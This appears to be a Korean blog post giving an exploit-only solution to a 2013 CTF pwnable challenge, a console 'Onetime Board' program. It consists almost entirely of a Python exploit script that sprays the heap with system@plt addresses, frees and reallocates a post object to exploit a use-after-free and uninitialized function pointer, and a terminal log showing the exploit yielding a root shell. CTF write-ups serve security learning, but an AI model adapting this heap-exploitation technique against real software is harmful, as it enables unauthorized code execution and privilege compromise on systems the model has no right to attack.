Category : Pwnables
Summary : use-after-free, using uninitialized function pointer
Exploit
#!/usr/bin/python import sys from struct import pack write = lambda author, title, content: sys.stdout.write("1\n"+author+"\n"+title+"\n"+content+"\n") read = lambda idx: sys.stdout.write("2\n"+str(idx)+"\n") delete = lambda: sys.stdout.write("1\n") modify = lambda author, title: sys.stdout.write("2\n"+author+"\n"+title+"\n") reply = lambda content: sys.stdout.write("3\n"+content+"\n") back = lambda: sys.stdout.write("4\n") p = lambda x: pack("<L", x) system_plt = 0x08048630 default_handler = 0x080487c4 ################ WRITE CONTENT ################## for i in range(3): write("pwn3r", "hello", p(default_handler)*0x300 + p(system_plt)*0x100) ################################################# ################ DELETE SECOND ################## read(2) for i in range(0x80): reply("my reply") delete() back() ################################################# ################ REALLOCATE ##################### for i in range(2): write("pwn3r", "hello again", "B"*4) read(4) for i in range(0xa0): reply("sh") ################################################# ################ TRIGGER VULN ################### modify("pwn3r", "good bye") delete() ################################################# |
root@ubuntu:~/vuln/400# (./exploit.py ;cat) | ./level4 _______________________________ /==============================/ | Onetime Board Console | /------------------------------/ | | WELCOME | | |__________|_________|_________| | W a i t | ++++++++++++++++++++++++++++++++ 1. Write 2. Read 3. Exit => Author : Title : Content : 1. Write 2. Read 3. Exit => Author : Title : Content : 1. Write............................................................... ............................................................... 1. delete 2. modify 3. reply 4. back => Author : Title : 1. delete 2. modify 3. reply 4. back => id uid=0(root) gid=0(root) 그룹들=0(root) |
'CTF > 2013' 카테고리의 다른 글
Plaid CTF 2013 - pork (Exploit only) (0) | 2013.04.22 |
---|---|
Codegate 2013 Qual - Vulnerab 500 (Exploit only) (0) | 2013.04.17 |
Codegate 2013 Qual - Vulnerab 300 (Exploit only) (0) | 2013.04.17 |
Codegate 2013 Qual - Vulnerab 200 (Exploit only) (0) | 2013.04.17 |
Codegate 2013 Qual Pwnable Chal Exploits (0) | 2013.04.17 |